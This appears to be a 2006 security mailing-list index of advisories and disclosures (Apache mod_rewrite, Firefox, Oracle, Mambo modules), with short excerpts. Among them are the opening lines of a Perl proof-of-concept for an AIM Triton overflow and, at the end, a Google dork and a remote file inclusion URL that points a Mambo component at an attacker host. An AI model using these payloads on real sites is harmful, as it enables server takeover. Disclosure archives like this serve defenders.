PrinceClan Chess Mambo Com <= 0.8 Remote Inclusion Vulnerability
2006-07-24 tr_zindan wolfsecurity org

Guestbook Mambo Module <== v1.3.0 Multiple Remote File Include Vulnerabilities
2006-07-28 matdhule gmail com

[SECURITY] [DSA 1129-1] New osiris packages fix arbitrary code execution
2006-07-28 joey infodrom org (Martin Schulze)

Apache mod_rewrite Buffer Overflow Vulnerability
2006-07-28 Avert avertlabs com

    McAfee, Inc.
    McAfee Avert(tm) Labs Security Advisory
    Public Release Date: 2006-07-09
    Apache 1.3.29/2.X mod_rewrite Buffer Over Vulnerability
    CVE-2006-3747
    ______________________________________________________________________
    * Synopsis
    Mod_rewrite is an Apache module that can be used ...

[Announcement] Apache HTTP Server 2.2.3 (2.0.59, 1.3.37) Released
2006-07-28 William A. Rowe, Jr. (wrowe apache org)

Oracle 10g R2 and, probably, all previous versions
2006-07-28 Russell Lowenthal (perpetualv yahoo com)

    Interesting comment. So if I understand what you are saying I should be able to create a user:
    SQL> create user nottoosmart identified by d0ntkn0wmuch;
    User created.
    SQL> grant create session to nottoosmart;
    Grant succeeded.
    SQL> connect nottoosmart/d0ntkn0wmuch
    Connected.
    SQL> alter session se ...

[ MDKSA-2006:132 ] - Updated libwmf packages fixes integer overflow vulnerability
2006-07-28 security mandriva com

[SECURITY] [DSA 1128-1] New heartbeat packages fix local denial of service
2006-07-28 joey infodrom org (Martin Schulze)

[SECURITY] [DSA 1127-1] New ethereal packages fix several vulnerabilities
2006-07-28 Moritz Muehlenhoff (jmm debian org)

[FLSA-2006:175040] Updated php packages fix security issues
2006-07-28 Marc Deslauriers (marcdeslauriers videotron ca)

[USN-328-1] Apache vulnerability
2006-07-28 Martin Pitt (martin pitt canonical com)

    ===========================================================
    Ubuntu Security Notice USN-328-1 July 27, 2006
    apache2 vulnerability
    CVE-2006-3747
    ===========================================================
    A security issue affects the following Ubuntu releases:
    Ubuntu 5.04
    Ubuntu 5.10
    U ...

Cisco Security Advisory: Windows VPN Client Local Privilege Escalation Vulnerability
2006-07-27 Cisco Systems Product Security Incident Response Team (psirt cisco com)

    -----BEGIN PGP SIGNED MESSAGE-----
    Hash: SHA1
    Cisco Security Advisory: Windows VPN Client Local Privilege Escalation Vulnerability
    Document ID: 70332
    Advisory ID: cisco-sa-20060524-vpnclient
    http://www.cisco.com/warp/public/707/cisco-sa-20060524-vpnclient.shtml
    Revision 2.0
    Last Updated 2006 ...

[USN-327-1] firefox vulnerabilities
2006-07-27 Martin Pitt (martin pitt canonical com)

    ===========================================================
    Ubuntu Security Notice USN-327-1 July 27, 2006
    firefox vulnerabilities
    CVE-2006-3113, CVE-2006-3677, CVE-2006-3801, CVE-2006-3802, CVE-2006-3803, CVE-2006-3805, CVE-2006-3806, CVE-2006-3807, CVE-2006-3808, CVE-2006-3809, CVE-2 ...

Re: HYSA-2006-008 myBloggie 2.1.3 CRLF & SQL Injection
2006-07-27 Steven M. Christey (coley mitre org)

    >--==CRLF injection==--
    >
    >GET /mybloggie/ HTTP/1.0
    >Accept: */*
    >User-Agent: Mozilla/4.0 (compatible; MSIE 6.0)
    >Host: 127.0.0.1:80
    >Cookie: PHPSESSID=op0-11{}};q, or something like that
    >Connection: Close

    This demonstration code does not contain any carriage return / line feed sequences. What ...

Oracle 10g R2 and, probably, all previous versions
2006-07-27 putosoft softputo (hasecorp hotmail com)

    I can't believe it. Oracle releases new patches and they have not been solved one of the main problems: A user with only the SELECT privilege can do WHATEVER (S)HE WANTS WITH THE ENTIRE DATABASE!!!! I'm not sure if is time to full disclosure it but, anyway, I will "full disclosure" one innocent i ...

AIM Triton 1.0.4 (SipXtapi) Remote Buffer Overflow Exploit (PoC)
2006-07-27 c0rrupt f34r us

    greetz...
    #!/usr/bin/perl
    #
    # p0c
    # Tested on Windows XP SP2 with triton 1.0.4
    # c0rrupt -{at}- f34r -{dot}- us
    #
    # This exploits the sipxtapi vuln in triton which was patched.. sometime ago..
    # The exploit sends a specially crafted udp packet to the triton client
    # which leads to comm ...

rPSA-2006-0137-1 firefox
2006-07-27 Justin M. Forbes (jmforbes rpath com)

    rPath Security Advisory: 2006-0137-1
    Published: 2006-07-26
    Products: rPath Linux 1
    Rating: Major
    Exposure Level Classification: User Deterministic Unauthorized Access
    Updated Versions: firefox=/conary.rpath.com@rpl:devel//1/1.5.0.5-1-0.1
    References: http://www.cve.mitre.org/cgi-bin/cven ...

ZDI-06-025: Mozilla Firefox Javascript navigator Object Vulnerability
2006-07-26 zdi-disclosures 3com com

    ZDI-06-025: Mozilla Firefox Javascript navigator Object Vulnerability
    http://www.zerodayinitiative.com/advisories/ZDI-06-025.html
    July 26, 2006
    -- CVE ID: CVE-2006-3677
    -- Affected Vendor: Mozilla
    -- Affected Products: Firefox 1.5.0 - 1.5.0.4 SeaMonkey 1.0 - 1.0.2
    -- TippingPoint(TM) IPS Custome ...

Bypassing Oracle dbms_assert
2006-07-27 ak red-database-security com (1 replies)

    Hey all,
    Today I released a new whitepaper "Bypassing Oracle dbms_assert". This technique makes many already fixed Oracle vulnerabilities (SQL Injection) exploitable again.
    URL: http://www.red-database-security.com/wp/bypass_dbms_assert.pdf
    Summary: By using specially crafted parameters ...

Re: Bypassing Oracle dbms_assert
2006-07-28 David Litchfield (davidl ngssoftware com) (1 replies)

RE: Bypassing Oracle dbms_assert
2006-07-28 Alexander Kornbrust (ak red-database-security com) (1 replies)
email: tr_zindan (at) wolfsecurity (dot) org
Url: http://www.hack-ezine.org
Greetz:EL_MuHaMMeD,CyberWolf,By_MaCRo And ALL WolFSecurityTeam USer
dor:inurl:com_pcchess
Exploit:
http://[host.com]/[path]/components/com_pcchess/include.pcchess.php?mosConfig_absolute_path=http://evil.txt?